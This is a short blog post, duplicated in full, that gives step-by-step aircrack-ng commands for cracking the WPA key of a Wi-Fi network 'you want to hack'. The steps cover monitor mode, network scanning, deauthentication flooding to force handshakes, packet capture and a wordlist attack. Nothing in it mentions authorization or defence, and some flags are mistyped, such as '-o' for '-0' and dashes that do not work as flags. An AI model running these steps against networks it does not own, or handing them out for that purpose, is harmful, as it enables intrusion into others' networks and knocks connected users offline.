Cracking WPA:
Using Backtrack 5r1 ( Aircrack )
1. Open a terminal ( i.e command Prompt )
2. Type airmon-ng
� for checking the wlan card is supported or not.
� checking chipset of wlan card ( i.e Artheros, Zydas, Intel )
� wlan card’s address ( i.e. Wlan0 )
3. Type airmon-ng start wlan0
� for enabling monitoring mode on wlan0 ( i.e Mon0 )
� Mon0 is the monitoring mode on your wlan card Wlan0.
4. Type airodump-ng mon0
� for showing packets flowing in the wifi connections and their BSSID’s (MAC address) and Channel on the respective
wifi connections.
5. Type aireplay-ng -0 5 -a "bssid" wlan0
� -o is for sending “deauth” deauthentication broadcast messages to the WiFi network for acquiring a handshake signal.
� This attack sends disassocate packets to one or more clients which are currently associated with a particular
access point. Disassociating clients can be done for a number of reasons:
� Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
� Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
� Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected).
6. Type airodump-ng –w “filename” –c “channel” –bssid “MAC Address” mon0
� This command will capture packets into a file from the respective wifi connection you want to hack of which bssid
and channel you will provide.
7. Finally Type aircrack-ng “filename-01.cap” –w “Path to the Wordlist “
� It will crack the WPA key from the file in which you are dumping the packets by tallying all possible
number of keys provided in the wordlist file . If the key is present in the wordlist file your key will be
decoded else not.
Click to see Video Tutorial
Contact => www.facebook.com/ryan.manjothi
Using Backtrack 5r1 ( Aircrack )
1. Open a terminal ( i.e command Prompt )
2. Type airmon-ng
� for checking the wlan card is supported or not.
� checking chipset of wlan card ( i.e Artheros, Zydas, Intel )
� wlan card’s address ( i.e. Wlan0 )
3. Type airmon-ng start wlan0
� for enabling monitoring mode on wlan0 ( i.e Mon0 )
� Mon0 is the monitoring mode on your wlan card Wlan0.
4. Type airodump-ng mon0
� for showing packets flowing in the wifi connections and their BSSID’s (MAC address) and Channel on the respective
wifi connections.
5. Type aireplay-ng -0 5 -a "bssid" wlan0
� -o is for sending “deauth” deauthentication broadcast messages to the WiFi network for acquiring a handshake signal.
� This attack sends disassocate packets to one or more clients which are currently associated with a particular
access point. Disassociating clients can be done for a number of reasons:
� Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
� Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
� Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected).
6. Type airodump-ng –w “filename” –c “channel” –bssid “MAC Address” mon0
� This command will capture packets into a file from the respective wifi connection you want to hack of which bssid
and channel you will provide.
7. Finally Type aircrack-ng “filename-01.cap” –w “Path to the Wordlist “
� It will crack the WPA key from the file in which you are dumping the packets by tallying all possible
number of keys provided in the wordlist file . If the key is present in the wordlist file your key will be
decoded else not.
Click to see Video Tutorial
Contact => www.facebook.com/ryan.manjothi
Posts
0 comments:
Post a Comment